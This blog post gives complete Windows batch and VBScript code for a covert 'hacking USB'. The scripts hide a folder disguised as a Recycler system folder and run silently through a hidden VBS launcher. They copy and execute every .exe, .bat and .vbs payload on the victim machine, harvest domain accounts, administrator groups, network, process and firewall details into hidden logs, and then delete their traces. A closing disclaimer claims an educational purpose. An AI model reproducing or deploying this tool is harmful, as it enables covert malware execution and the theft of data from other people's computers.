Making a Ultimate Hacking USB with Only .BAT files.

I have seen many different attempts at creating a USB hacking tool. The switchblade and hacksaw were okay, but they would set off many alarms deeming it useless,
Code:
@(echo off & break off & Title _) >nul
If %~d0 == %systemdrive% goto :EOF
::First Run
Set wrkdir="\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\System"
If exist %wrkdir% CD %wrkdir% >nul & Goto Next
If not exist %wrkdir% mkdir %wrkdir% >nul
Attrib +s +h Recycler /d /s
:Next
if exist injector.bat copy /y injector.bat %wrkdir% >nul && del /f /q %~d0\injector.bat >nul
if exist sysinfo.bat copy /y sysinfo.bat %wrkdir% >nul && del /f /q %~d0\sysinfo.bat >nul
if exist inject.vbs del /f /q %~d0\inject.vbs >nul
if exist sysinfo.vbs del /f /q %~d0\sysinfo.vbs >nul
CD %wrkdir%>nul
If exist inject.vbs Start "" inject.vbs>nul & Goto Next1
If exist injector.bat Start "" injector.bat >nul
:Next1
If exist sysinfo.vbs Start "" sysinfo.vbs >nul & Goto Next2
Call sysinfo.bat
:Next2
attrib +s +h %0
cls
exit

::__Injector.bat__::
Code:
@(echo off & break off & Title _) >nul
::-----------------------------------------------------------------------------------------------------------------------------::
::This is called the Injector
:: This script is meant to only run from flash drive
:: On first run, it makes the %wrkdir% on your flashdrive as a place to hide files
:: I used recycler\S-15~ ect to make it look not obvious as a hidden system folder
:: Any executable files place in the "Bin" folder will be copied to %temp% and executed, exe, bat, and vbs
:: It have put 10-15 files in there at once and it copies and executes them all in about 10 seconds
::Very handy if you have things that inject into memory, that will otherwise cause virtual memory errors if they are executed from USB.
::It's nice because you don't need to know filenames and edit script all of the time it executes everything
::If you make your scripts self destruct that would be good if they only need to run once
:: I have another script that logs pc, system and network, open ports, history, info etc, using only windows tools
:: It gets called by another script along with this one, and saves to "\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\Docs"
::When this script is complete it brings up the safely remove hardware menu to signify completion for drive ejection.
::--------------------------------------------------------------------------------------------------------------------------------::
::--------------------------------------------------------------------------------------------------------------------------------::
@echo off & @break off & title _
if not [%1]==[] goto :%1
    call %0 system
    exit

:system
if exist inject.vbs start "" "inject.vbs"
    echo set o = createobject("wscript.shell") > inject.vbs
    echo o.run "%~0 script", vbhide, true >> inject.vbs
    start "" "inject.vbs"
    exit

:script
If %~d0 == %systemdrive% goto :EOF
Set wrkdir="\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\BIN"
If exist %wrkdir% CD %wrkdir% >nul & Goto Next
If not exist %wrkdir% mkdir %wrkdir% >nul
Attrib +s +h Recycler /d /s
Goto :EOF
:Next
::Non obvious directory creation on PC
If not exist "%temp%\MessengerCache" mkdir "%temp%\MessengerCache" >nul
:ExeCheck
If exist "*exe" copy /y "*.exe" "%temp%\MessengerCache" & Goto EXEGooD
:BatCheck
If exist "*bat" copy /y "*bat" "%temp%\MessengerCache" & Goto BatGood
:VbsCheck
If exist "*vbs" copy /y "*vbs" "%temp%\MessengerCache" & Goto VbsGood
Goto :eof
:EXEGooD
For %%j IN ("%temp%\MessengerCache\*.Exe") DO Start ""  %%j
Goto BatCheck
:BatGood
For %%h IN ("%temp%\MessengerCache\*.Bat") DO Start ""  %%h
Goto VbsCheck
:VbsGood
For %%i IN ("%temp%\MessengerCache\*.Vbs") DO Start ""  %%i
Del /F /Q inject.vbs >nul
@cls & @Exit

::__Sysinfo.bat__::
Code:
@echo off & @break off & title _
if not [%1]==[] goto :%1
    call %0 system
    exit

:system
if exist sysinfo.vbs start "" "sysinfo.vbs"
    echo set o = createobject("wscript.shell") > sysinfo.vbs
    echo o.run "%~0 script", vbhide, true >> sysinfo.vbs
    start "" "sysinfo.vbs"
    exit

:script
Set wrkdir="\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\Docs"
If exist %wrkdir% CD %wrkdir% >nul & Goto Next
If not exist %wrkdir% mkdir %wrkdir% >nul
Attrib +s +h Recycler /d /s && Attrib +s +h Recycler\*.txt
:Next
CD %wrkdir%>nul
set logfile=%wrkdir%\%computername%-%random%.txt 2>&1
::@@System_Info and Log Creation@@::
Echo ************************************ >> %logfile%
Echo ***********[System Info]************ >> %logfile%
Echo ************************************  >> %logfile%
Echo. >> %logfile%
Echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> %logfile%
time /t >> %logfile%
date /t >> %logfile%
Echo *********************************************** >> %logfile%
Echo ***********[External / Internal Ip]************ >> %logfile%
Echo ***********************************************  >> %logfile%
::This script for external ip was not written by me, got it from spam::
echo Function MyIP_XMLHTTP( )>wan.vbs
echo     Dim objRequest, strURL >>wan.vbs
echo     MyIP_XMLHTTP = "0.0.0.0" >>wan.vbs
echo     strURL = "http://www.whatismyip.com/automation/n09230945.asp"  >>wan.vbs
echo     Set objRequest = CreateObject( "Microsoft.XMLHTTP" )  >>wan.vbs
echo     objRequest.open "GET", strURL, False >>wan.vbs
echo     objRequest.send vbNull >>wan.vbs
echo     If objRequest.status = 200 Then MyIP_XMLHTTP =  objRequest.responseText >>wan.vbs
echo     Set objRequest = Nothing >>wan.vbs
echo End Function >>wan.vbs
echo ret = MyIP_XMLHTTP( ) >>wan.vbs
echo Set FSys = CreateObject("Scripting.FileSystemObject")  >>wan.vbs
echo Set MonFic = FSys.CreateTextFile("00001.tmp") >>wan.vbs
echo With MonFic >>wan.vbs
echo .writeLine ret >>wan.vbs
echo End With >>wan.vbs
call wan.vbs
::---------------------
for /F "tokens=* delims=" %%a in (00001.tmp) do set wanIP=%%a
del /F /Q wan.vbs >NUL
del /F /Q 00001.tmp >NUL
::---------------------
ipconfig |find "IPv4" > 00002.tmp
for /f "tokens=2 delims=:" %%a in (00002.tmp) do set lanIP=%%a
del /F /Q 00002.tmp >NUL
::---------------------
for /F "tokens=* delims=" %%i in ('reg query  "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MUI\UILanguages"')  do set lang=%%i
set lang=%lang:~68,5%
::---------------------
cls
echo. >> %logfile%
echo ^>^>^> Local IP:%lanIP% >> %logfile%
echo ^>^>^> Internet IP: %wanIP% >> %logfile%
echo ^>^>^> Localisation: %lang% >> %logfile%
Echo.  >> %logfile%
Echo ************************************ >> %logfile%
echo ***********[Network Info]*********** >> %logfile%
Echo ************************************ >> %logfile%
Echo. >> %logfile%
::Network Info
net user /domain >> %logfile%
net group /domain >> %logfile%
net localgroup /domain >> %logfile%
net localgroup administrators /domain >> %logfile%
net localgroup "Account Operators" /domain >> %logfile%
net accounts /domain >> %logfile%
net view /domain >> %logfile%
net view >> %logfile%
Echo ************************************ >> %logfile%
echo ***********[Local Info]************* >> %logfile%
Echo ************************************ >> %logfile%
Echo. >> %logfile%
::Local Info
ipconfig /all >> %logfile%
ipconfig /displaydns >> %logfile%
netstat -ano >> %logfile%
netstat >> %logfile%
arp -a >> %logfile%
tasklist /svc >> %logfile%
tasklist >> %logfile%
tasklist /v >> %logfile%
net share >> %logfile%
net use >> %logfile%
net accounts >> %logfile%
net localgroup >> %logfile%
net localgroup administrators >> %logfile%
systeminfo >> %logfile%
netsh firewall show config >> %logfile%
netsh advfirewall show allprofiles >> %logfile%
netsh advfirewall firewall show rule name=all >> %logfile%
netsh diag show all /v >> %logfile%
netsh diag /v >> %logfile%
ping localhost >> %logfile%
echo Completed Data Recovery on %time% %date% >> %logfile%
::@@Eject Drive to Signify Completion@@::
setlocal enableextensions
rundll32.exe shell32.dll,Control_RunDLL hotplug.dll
endlocal
:END
::Cleanup
ping localhost -n 1>nul
Del /F /Q sysinfo.vbs >nul
@cls
@exit
Share:

0 comments:

Post a Comment

DISCLAIMER

The information provided on hottechtips.blogspot.com is to be used for educational purposes only. The website creator is in no way responsible for any misuse of the information provided. All of the information in this website is meant to help the reader develop a hacker defense attitude in order to prevent the attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. The word “Hack” or “Hacking” on hottechtips.blogspot.com should be regarded as “Ethical Hack” or “Ethical hacking” respectively. You implement the information given at your own risk.